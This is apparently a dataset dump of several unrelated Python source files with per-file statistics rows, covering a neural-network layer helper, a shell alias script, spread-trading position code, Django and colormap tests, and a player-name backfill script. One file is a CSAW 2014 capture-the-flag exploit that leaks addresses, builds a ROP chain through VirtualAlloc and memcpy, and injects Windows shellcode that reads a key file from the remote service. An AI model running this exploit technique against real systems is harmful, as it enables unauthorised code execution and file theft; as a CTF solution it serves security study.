def get_default_fc(num_ftrs,adjusted_classes, params):
return nn.Sequential(
nn.Linear(num_ftrs, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_0),
nn.Linear(1024, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_1),
nn.Linear(1024, adjusted_classes)
)
| 34.111111 | 79 | 0.703583 | 50 | 307 | 4.08 | 0.48 | 0.117647 | 0.098039 | 0.117647 | 0.343137 | 0.343137 | 0.343137 | 0.343137 | 0.343137 | 0.343137 | 0 | 0.069767 | 0.159609 | 307 | 8 | 80 | 38.375 | 0.72093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.142857 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
abea45b584c7c99d2b9324078e8fed24a7f61377 | 369 | py | Python | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | """Runs when the `poop` alias has not been setup."""
from colorama import init
from ..utils import colored
from .alias import is_configured
from .alias import configure
init()
def main():
if not is_configured():
configure()
print(colored('The `poop` alias was configured successfully.\n'
'Run `source ~/.bashrc` or restart your shell.'))
| 21.705882 | 67 | 0.682927 | 50 | 369 | 5 | 0.64 | 0.056 | 0.096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205962 | 369 | 16 | 68 | 23.0625 | 0.853242 | 0.124661 | 0 | 0 | 0 | 0 | 0.290221 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | true | 0 | 0.4 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
abfa15dff9f5420c035b3826b1395528ac642299 | 3,517 | py | Python | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | 2 | 2015-03-24T22:20:08.000Z | 2018-05-12T16:41:13.000Z | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | null | null | null | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | null | null | null | import socket
import re
from struct import pack
from time import sleep
def recv_until(s, string=""):
text = ""
while 1 :
data = s.recv(4096)
text+=data
if not data or data.find(string) != -1:
break
return text
def leak(s):
s.send("A\n")
text = recv_until(s, "Selection:")
slide, stack = re.findall('0x[0-9a-f]{8}', text)
slide = int(slide, 16) + 0x400000
stack = int(stack, 16)
return (slide, stack)
def vuln(s, payload):
s.send("V\n")
recv_until(s, "(with some constraints).")
s.send(payload)
host = '192.168.0.10'
s=socket.create_connection((host, 9998))
recv_until(s, "Password:")
s.send('GreenhornSecretPassword!!!\n')
### leak
recv_until(s, 'Selection:')
slide, stack = leak(s)
VirtualAlloc = 0x11c0 + slide
memcpy = 0x1684 + slide
print_output = 0x14d0 + slide
pop4 = 0x199e + slide
ret = 0x19a2 + slide
eip_off = 0x404
buffer_start = stack - 0x3f8
shellcode_loc = buffer_start + 4
shellcode_len = 0x400
### ROP
"""cedcl_ convention"""
rop = [
VirtualAlloc, #wrapper
pop4,
0,
0x1000,
0x40,
buffer_start + eip_off + 4 * 8, #will stock ptr to alloc' zone in memcpy 1st arg
memcpy,
ret, #will return to 1st param
0xcccccccc,
shellcode_loc,
shellcode_len
]
shellcode = [0x55, 0x89, 0xE5, 0x81, 0xEC, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45,
0xFC, 0x64, 0x8B, 0x1D, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x5B, 0x0C, 0x8B,
0x5B, 0x14, 0x8B, 0x1B, 0x8B, 0x1B, 0x8B, 0x5B, 0x10, 0x8B, 0x73, 0x3C,
0x01, 0xDE, 0x8B, 0x76, 0x78, 0x01, 0xDE, 0x56, 0x8B, 0x7E, 0x20, 0x01,
0xDF, 0x8B, 0x4E, 0x14, 0x31, 0xC0, 0x57, 0x51, 0x8B, 0x3F, 0x01, 0xDF,
0xBE, 0xFA, 0x00, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x31, 0xC9, 0xB1, 0x0E,
0xF3, 0xA6, 0x59, 0x5F, 0x74, 0x0B, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00,
0x40, 0xE2, 0xDF, 0x0F, 0x0B, 0x5E, 0x8B, 0x56, 0x24, 0x01, 0xDA, 0xD1,
0xE0, 0x01, 0xD0, 0x31, 0xC9, 0x66, 0x8B, 0x08, 0x8B, 0x46, 0x1C, 0x01,
0xD8, 0xC1, 0xE1, 0x02, 0x01, 0xC8, 0x8B, 0x10, 0x01, 0xDA, 0x5E, 0x89,
0xF7, 0x31, 0xC9, 0x89, 0x55, 0xF8, 0x89, 0x5D, 0xF4, 0xBE, 0x09, 0x01,
0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 0x75, 0xF4, 0xFF, 0x55, 0xF8,
0x89, 0xC3, 0x68, 0x6B, 0x65, 0x79, 0x00, 0x89, 0xE0, 0x68, 0x00, 0x00,
0x00, 0x00, 0x68, 0x80, 0x00, 0x00, 0x00, 0x68, 0x03, 0x00, 0x00, 0x00,
0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x01, 0x00, 0x00, 0x00, 0xB9, 0x00,
0x00, 0x00, 0x80, 0x51, 0x50, 0xFF, 0xD3, 0x81, 0xC4, 0x04, 0x00, 0x00,
0x00, 0x50, 0xBE, 0x15, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF,
0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x5B, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00,
0x89, 0xE1, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00,
0x68, 0x00, 0x01, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0x45, 0xFC,
0x8B, 0x80, 0x1E, 0x01, 0x00, 0x00, 0x54, 0xFF, 0xD0, 0x0F, 0x0B, 0x47,
0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73,
0x73, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65,
0x41, 0x00, 0x52, 0x65, 0x61, 0x64, 0x46, 0x69, 0x6C, 0x65, 0x00,
# exclude last 4 bytes since we want to replace them
0xCC, 0xCC, 0xCC, 0xCC, ][:-4]
exploit = "CSAW" #mandatory
exploit += "".join([chr(c) for c in shellcode])
exploit += pack("<I", print_output) #print result of ReadFile back to us
exploit += "\xcc"*(eip_off - len(exploit))
exploit += "".join([pack("<I", dword) for dword in rop])
vuln(s, exploit)
s.shutdown(socket.SHUT_WR)
sleep(1)
print s.recv(1024)
| 33.179245 | 88 | 0.639181 | 539 | 3,517 | 4.133581 | 0.402597 | 0.125673 | 0.091562 | 0.043088 | 0.130162 | 0.121185 | 0.084381 | 0.078995 | 0.078995 | 0.046679 | 0 | 0.296656 | 0.209269 | 3,517 | 105 | 89 | 33.495238 | 0.504495 | 0.051464 | 0 | 0 | 0 | 0 | 0.037576 | 0.008485 | 0 | 0 | 0.373636 | 0 | 0 | 0 | null | null | 0.023529 | 0.047059 | null | null | 0.035294 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
abfa9fcc8c8d6fc061a4cea57ebd8295d4f79af3 | 9,504 | py | Python | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy1.7 | 25a95ba63c7797e92ba45450d79ee1326135fb47 | [
"MIT"
] | 1 | 2017-10-09T06:05:11.000Z | 2017-10-09T06:05:11.000Z | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy-1.7 | ccca92139198a0d213c15fe531f37c1c702ee968 | [
"MIT"
] | null | null | null | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy-1.7 | ccca92139198a0d213c15fe531f37c1c702ee968 | [
"MIT"
] | null | null | null | # encoding: UTF-8
from __future__ import division
from datetime import datetime
from math import floor
import pandas as pd
import numpy as np
import sys
sys.path.append('../')
#sys.path.append('D:\\tr\\vnpy-master\\vn.trader\\DAO')
sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\DAO')
sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\common')
import vnpy.DAO
import vnpy.common
from vnpy.DAO import *
from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT,
EMPTY_STRING, EMPTY_UNICODE)
EVENT_SPREADTRADING_TICK = 'eSpreadTradingTick.'
EVENT_SPREADTRADING_POS = 'eSpreadTradingPos.'
EVENT_SPREADTRADING_LOG = 'eSpreadTradingLog'
EVENT_SPREADTRADING_ALGO = 'eSpreadTradingAlgo.'
EVENT_SPREADTRADING_ALGOLOG = 'eSpreadTradingAlgoLog'
########################################################################
class StLeg(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING # 代码
self.ratio = EMPTY_INT # 实际交易时的比例
self.multiplier = EMPTY_FLOAT # 计算价差时的乘数
self.payup = EMPTY_INT # 对冲时的超价tick
self.bidPrice = EMPTY_FLOAT
self.askPrice = EMPTY_FLOAT
self.bidVolume = EMPTY_INT
self.askVolume = EMPTY_INT
self.longPos = EMPTY_INT
self.shortPos = EMPTY_INT
self.netPos = EMPTY_INT
self.actleg = EMPTY_INT
self.actlegPos = EMPTY_FLOAT
self.passleg = EMPTY_INT
self.passlegPos = EMPTY_FLOAT
self.profitloss = EMPTY_FLOAT
########################################################################
class StSpread(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.name = EMPTY_UNICODE # 名称
self.symbol = EMPTY_STRING # 代码(基于组成腿计算)
self.activeLeg = None # 主动腿
self.passiveLegs = [] # 被动腿(支持多条)
self.allLegs = [] # 所有腿
self.bidPrice = EMPTY_FLOAT
self.askPrice = EMPTY_FLOAT
self.bidVolume = EMPTY_INT
self.askVolume = EMPTY_INT
self.time = EMPTY_STRING
self.longPos = EMPTY_INT
self.shortPos = EMPTY_INT
self.netPos = EMPTY_INT
self.actlegLongPos = EMPTY_INT
self.actlegLongValue = EMPTY_FLOAT
self.actlegShortPos = EMPTY_INT
self.actlegShortValue = EMPTY_FLOAT
self.passlegLongPos = EMPTY_INT
self.passlegLongValue = EMPTY_FLOAT
self.passlegShortgPos = EMPTY_INT
self.passlegShortValue = EMPTY_FLOAT
self.profitloss = EMPTY_FLOAT
#----------------------------------------------------------------------
def initSpread(self):
"""初始化价差"""
# 价差最少要有一条主动腿
if not self.activeLeg:
return
# 生成所有腿列表
self.allLegs.append(self.activeLeg)
self.allLegs.extend(self.passiveLegs)
# 生成价差代码
legSymbolList = []
for leg in self.allLegs:
if leg.multiplier >= 0:
legSymbol = '+%s*%s' %(leg.multiplier, leg.vtSymbol)
else:
legSymbol = '%s*%s' %(leg.multiplier, leg.vtSymbol)
legSymbolList.append(legSymbol)
self.symbol = ''.join(legSymbolList)
#----------------------------------------------------------------------
def calculatePrice(self):
"""计算价格"""
# 清空价格和委托量数据
self.bidPrice = EMPTY_FLOAT
self.askPrice = EMPTY_FLOAT
self.askVolume = EMPTY_INT
self.bidVolume = EMPTY_INT
# 遍历价差腿列表
for n, leg in enumerate(self.allLegs):
# 计算价格
if leg.multiplier > 0:
self.bidPrice += leg.bidPrice * leg.multiplier
self.askPrice += leg.askPrice * leg.multiplier
else:
self.bidPrice += leg.askPrice * leg.multiplier
self.askPrice += leg.bidPrice * leg.multiplier
# 计算报单量:floor向下取整
if leg.ratio > 0:
legAdjustedBidVolume = floor(leg.bidVolume / leg.ratio)
legAdjustedAskVolume = floor(leg.askVolume / leg.ratio)
else:
legAdjustedBidVolume = floor(leg.askVolume / abs(leg.ratio))
legAdjustedAskVolume = floor(leg.bidVolume / abs(leg.ratio))
if n == 0:
self.bidVolume = legAdjustedBidVolume # 对于第一条腿,直接初始化
self.askVolume = legAdjustedAskVolume
else:
self.bidVolume = min(self.bidVolume, legAdjustedBidVolume) # 对于后续的腿,价差可交易报单量取较小值
self.askVolume = min(self.askVolume, legAdjustedAskVolume)
# 更新时间
self.time = datetime.now().strftime('%H:%M:%S.%f')[:-3]
#----------------------------------------------------------------------
def calculatePos(self):
"""计算持仓"""
# 清空持仓数据
self.longPos = EMPTY_INT
self.shortPos = EMPTY_INT
self.netPos = EMPTY_INT
self.actlegLongPos = EMPTY_INT
self.actlegLongValue = EMPTY_FLOAT
self.actlegShortPos = EMPTY_INT
self.actlegShortValue = EMPTY_FLOAT
self.passlegLongPos = EMPTY_INT
self.passlegLongValue = EMPTY_FLOAT
self.passlegShortgPos = EMPTY_INT
self.passlegShortValue = EMPTY_FLOAT
self.profitloss = EMPTY_FLOAT
# 遍历价差腿列表
for n, leg in enumerate(self.allLegs):
if leg.ratio > 0:
legAdjustedLongPos = floor(leg.longPos / leg.ratio)
legAdjustedShortPos = floor(leg.shortPos / leg.ratio)
else:
legAdjustedLongPos = floor(leg.shortPos / abs(leg.ratio))
legAdjustedShortPos = floor(leg.longPos / abs(leg.ratio))
if n == 0:
self.longPos = legAdjustedLongPos
self.shortPos = legAdjustedShortPos
else:
self.longPos = min(self.longPos, legAdjustedLongPos)
self.shortPos = min(self.shortPos, legAdjustedShortPos)
#计算浮动盈亏
sql = ' SELECT LONG_POSITION, LONG_POSITION*LONG_OPEN_AVG_PRICE,SHORT_POSITION,SHORT_POSITION*SHORT_OPEN_AVG_PRICE' \
' from defer_real_hold where SYMBOL = \'%s\' and STRATAGE = \'%s\' ' % (leg.vtSymbol, self.name)
#retPos = vnpy.DAO.getDataBySQL('vnpy', sql)
print (u'leginfo:vtSymbol=%s,name=%s' % (leg.vtSymbol, self.name))
retPos = vnpy.DAO.getDataBySQL('vnpy', sql)
# 根据以上条件查询出的默认持仓只有一条记录,目前被动腿也只有一条leg
print retPos
print leg
print self.activeLeg,self.passiveLegs
if leg == self.activeLeg:
print (u'leginfo:self.askPrice=%s' % (str(self.askPrice)))
self.actlegLongPos = retPos.icol(0).get_values()
self.actlegLongValue = retPos.icol(1).get_values()
self.actlegShortPos = retPos.icol(2).get_values()
self.actlegShortValue = retPos.icol(3).get_values()
print self.actlegLongPos,self.actlegLongValue,self.actlegShortPos,self.actlegShortValue
#被动腿有可能有多条腿
elif leg in self.passiveLegs:
self.passlegLongPos += retPos.icol(0).get_values()
self.passlegLongValue += retPos.icol(1).get_values()
self.passlegShortgPos += retPos.icol(2).get_values()
self.passlegShortValue += retPos.icol(3).get_values()
else:
pass
#浮动盈亏=主动腿盈亏+被动腿盈亏
self.profitloss = (self.actlegLongValue - self.actlegLongPos * leg.askPrice ) + (self.passlegShortValue - self.passlegShortgPos * leg.bidPrice) \
+ (self.actlegShortValue - self.actlegShortPos * leg.bidPrice) + ( self.passlegLongValue - self.passlegLongPos * leg.askPrice)
#self.profitloss = self.actlegLongPos*self.askPrice + self.actlegShortPos*self.bidPrice
print (u'leginfo:self.actleg=%s,self.actlegPos=%s,self.profitloss=%s' % (str(self.actlegLongPos), str(self.actlegLongValue),str(self.profitloss)))
# 计算净仓位
self.longPos = int(self.longPos)
self.shortPos = int(self.shortPos)
self.netPos = self.longPos - self.shortPos
#wzhua 20170917 新增计算浮动盈亏
self.actlegLongPos = int(self.actlegLongPos)
self.actlegLongValue = float(self.actlegLongValue)
self.actlegShortPos = int(self.actlegShortPos)
self.actlegShortValue = float(self.actlegShortValue)
self.passlegLongPos = int(self.passlegLongPos)
self.passlegLongValue = float(self.passlegLongValue)
self.passlegShortgPos = int(self.passlegShortgPos)
self.passlegShortValue = float(self.passlegShortValue)
self.profitloss = float(self.profitloss)
#----------------------------------------------------------------------
def addActiveLeg(self, leg):
"""添加主动腿"""
self.activeLeg = leg
#----------------------------------------------------------------------
def addPassiveLeg(self, leg):
"""添加被动腿"""
self.passiveLegs.append(leg)
| 37.270588 | 158 | 0.551557 | 865 | 9,504 | 5.947977 | 0.210405 | 0.040816 | 0.055977 | 0.008163 | 0.35724 | 0.29174 | 0.240816 | 0.219825 | 0.205831 | 0.196501 | 0 | 0.004161 | 0.291982 | 9,504 | 255 | 159 | 37.270588 | 0.76044 | 0.101957 | 0 | 0.333333 | 0 | 0 | 0.054882 | 0.032954 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.163636 | 0.060606 | null | null | 0.042424 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
abfe2c1cf99654791bb342078effa2478f34e393 | 310 | py | Python | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | import pytest
from hamcrest import assert_that, equal_to, is_
from django.conf import settings
@pytest.mark.django_db
def test_user_get_absolute_url(user: settings.AUTH_USER_MODEL):
expected_url = '/users/{0}/'.format(user.username)
assert_that(user.get_absolute_url(), is_(equal_to(expected_url)))
| 28.181818 | 69 | 0.790323 | 48 | 310 | 4.75 | 0.5625 | 0.087719 | 0.131579 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003597 | 0.103226 | 310 | 10 | 70 | 31 | 0.816547 | 0 | 0 | 0 | 0 | 0 | 0.035484 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
abffd96161e8443437fe3910d4ce59e8abc42d99 | 731 | py | Python | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 4 | 2021-11-09T04:11:51.000Z | 2022-01-30T01:03:16.000Z | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 55 | 2021-11-15T16:36:25.000Z | 2022-03-10T04:48:08.000Z | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 1 | 2021-11-12T02:14:07.000Z | 2021-11-12T02:14:07.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Version testing
Don't want to run when running `pytest`, only run when something
is pushed to develop branch or PR to master.
"""
import configparser
import requests
from com_server import __version__
from passive.cmp_version import Version
def test_version_greater() -> None:
"""Tests if current version is greater than version on master branch on github"""
req = requests.get(
"https://raw.githubusercontent.com/jonyboi396825/COM-Server/master/setup.cfg"
)
cfg = configparser.ConfigParser()
cfg.read_string(req.text)
master_vers = Version(cfg["metadata"]["version"])
cur_vers = Version(__version__)
assert cur_vers > master_vers
| 23.580645 | 85 | 0.719562 | 99 | 731 | 5.141414 | 0.59596 | 0.027505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013267 | 0.175103 | 731 | 30 | 86 | 24.366667 | 0.830846 | 0.336525 | 0 | 0 | 0 | 0 | 0.191083 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.076923 | false | 0.076923 | 0.307692 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
2800fe4ff8f5543c36554bc37b647db2a125d9ae | 390 | py | Python | mp/visualize/models.py | Ecotrust/PEW-EFH | 83e404fe90e957891ab2dfaad327e52346cea748 | [
"Apache-2.0"
] | 1 | 2017-09-06T14:05:48.000Z | 2017-09-06T14:05:48.000Z | mp/visualize/models.py | Ecotrust/PEW-EFH | 83e404fe90e957891ab2dfaad327e52346cea748 | [
"Apache-2.0"
] | 126 | 2015-01-05T19:47:52.000Z | 2021-09-07T23:44:29.000Z | mp/visualize/models.py | Ecotrust/COMPASS | 42ee113e4d66767300cfab0d6ce1f35847f447ed | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django.conf import settings
from django.contrib.gis.db import models
from madrona.features import register
from madrona.features.models import Feature
@register
class Bookmark(Feature):
url_hash = models.CharField(max_length=2050)
class Options:
verbose_name = 'Marine Planner Bookmark'
form = 'visualize.forms.BookmarkForm' | 27.857143 | 49 | 0.761538 | 50 | 390 | 5.88 | 0.6 | 0.102041 | 0.095238 | 0.122449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012384 | 0.171795 | 390 | 14 | 50 | 27.857143 | 0.897833 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0.071611 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.454545 | 0 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e608539fab23c3cf7080aa7205e16f057ed4a51c | 2,132 | py | Python | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | 3 | 2020-06-14T13:12:33.000Z | 2022-01-03T21:41:16.000Z | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | null | null | null | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | null | null | null | """
Tests for `coloripy` module.
"""
import numpy as np
from math import isclose
import coloripy as cp
class TestColoripy(object):
@classmethod
def setup_class(cls):
pass
def test_skew_scale(self):
modes = ['linear', 'square', 'cubic', 'power', 'sqrt']
vals = [0., 0.5, 1.]
for mode, val in zip(modes, vals):
assert isclose(cp.skew_scale(val, mode=mode), val)
def test_get_cmap(self):
standard = np.array([[0.23137255, 0.29803922, 0.75294118],
[0.21960784, 0.41568627, 0.87058824],
[0.23137255, 0.5372549, 0.97647059],
[0.29019608, 0.65490196, 1.0627451 ],
[0.39215686, 0.76862745, 1.12941176],
[0.52941176, 0.87843137, 1.18039216],
[0.67843137, 0.97647059, 1.20784314],
[0.84313725, 1.0627451, 1.21568627],
[1.00784314, 1.12941176, 1.21176471],
[1.17254902, 1.17647059, 1.19607843],
[1.32941176, 1.19607843, 1.17647059],
[1.2745098 , 1.14901961, 1.03137255],
[1.22745098, 1.0745098, 0.87843137],
[1.18431373, 0.98431373, 0.7254902 ],
[1.14117647, 0.87843137, 0.58431373],
[1.09019608, 0.76078431, 0.45490196],
[1.03137255, 0.63137255, 0.34901961],
[0.96470588, 0.50196078, 0.26666667],
[0.88627451, 0.36862745, 0.20784314],
[0.8, 0.22745098, 0.17254902],
[0.70588235, 0.01568627, 0.14901961]])
rgb1 = np.array([59, 76, 192])
rgb2 = np.array([180, 4, 38])
ref_point = [221., 221., 221.]
cmap = cp.MshColorMap(rgb1, rgb2, ref_point=ref_point,
num_bins=21).get_colormap()
assert isclose(np.sum(cmap-standard), 0., abs_tol=1e-8)
@classmethod
def teardown_class(cls):
pass
| 38.071429 | 66 | 0.486867 | 239 | 2,132 | 4.288703 | 0.476987 | 0.020488 | 0.023415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.445537 | 0.379925 | 2,132 | 55 | 67 | 38.763636 | 0.329803 | 0.013133 | 0 | 0.093023 | 0 | 0 | 0.012405 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 1 | 0.093023 | false | 0.046512 | 0.069767 | 0 | 0.186047 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e62704d640c5f34b51dc4894e557ad6bcb2ec7d5 | 1,637 | py | Python | ad_hoc/name_mapper_backfill.py | Connor-R/NSBL | 16615990d058d171fab4790f937846fd1f0b2ee9 | [
"MIT"
] | 1 | 2020-11-19T23:20:19.000Z | 2020-11-19T23:20:19.000Z | ad_hoc/name_mapper_backfill.py | Connor-R/NSBL | 16615990d058d171fab4790f937846fd1f0b2ee9 | [
"MIT"
] | null | null | null | ad_hoc/name_mapper_backfill.py | Connor-R/NSBL | 16615990d058d171fab4790f937846fd1f0b2ee9 | [
"MIT"
] | null | null | null | from py_db import db
import NSBL_helpers as helper
db = db("NSBL")
table_dict = {"register_batting_analytical": "a.player_name"
, "register_batting_primary": "a.player_name"
, "register_batting_secondary": "a.player_name"
, "register_batting_splits": "a.player_name"
, "register_pitching_analytical": "a.player_name"
, "register_pitching_primary": "a.player_name"
, "register_pitching_rates_relief": "a.player_name"
, "register_pitching_rates_start": "a.player_name"
, "register_pitching_secondary": "a.player_name"
, "zips_defense": "a.player_name"
, "zips_fangraphs_batters_counting": "a.Player"
, "zips_fangraphs_batters_rate": "a.Player"
, "zips_fangraphs_pitchers_counting": "a.Player"
, "zips_fangraphs_pitchers_rate": "a.Player"
, "zips_offense": "a.player_name"
, "zips_offense_splits": "a.player_name"
, "zips_pitching": "a.player_name"
, "zips_pitching_splits": "a.player_name"
, "mlb_prospects.fg_raw": "a.playerName"
, "mlb_prospects.minorleagueball_professional": "a.full_name"
, "mlb_prospects.mlb_prospects_draft": "CONCAT(a.fname, ' ', a.lname)"
, "mlb_prospects.mlb_prospects_international": "CONCAT(a.fname, ' ', a.lname)"
, "mlb_prospects.mlb_prospects_professional": "CONCAT(a.fname, ' ', a.lname)"
}
for k,v in table_dict.items():
print k
qry = """
SELECT DISTINCT %s
FROM %s a
LEFT JOIN name_mapper nm ON (%s = nm.wrong_name)
WHERE 1
AND nm.wrong_name IS NULL
""" % (v, k, v)
# raw_input(qry)
names = db.query(qry)
for name in names:
helper.input_name(name[0])
| 32.098039 | 82 | 0.681735 | 218 | 1,637 | 4.770642 | 0.316514 | 0.121154 | 0.148077 | 0.146154 | 0.477885 | 0.142308 | 0.080769 | 0.080769 | 0.080769 | 0 | 0 | 0.001484 | 0.176542 | 1,637 | 50 | 83 | 32.74 | 0.77003 | 0.008552 | 0 | 0 | 0 | 0 | 0.665022 | 0.316471 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.051282 | null | null | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e62dd8453d35731f8df986056643c1efd1e8ea57 | 1,257 | py | Python | py/py_0105_special_subset_sums_testing.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0105_special_subset_sums_testing.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0105_special_subset_sums_testing.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
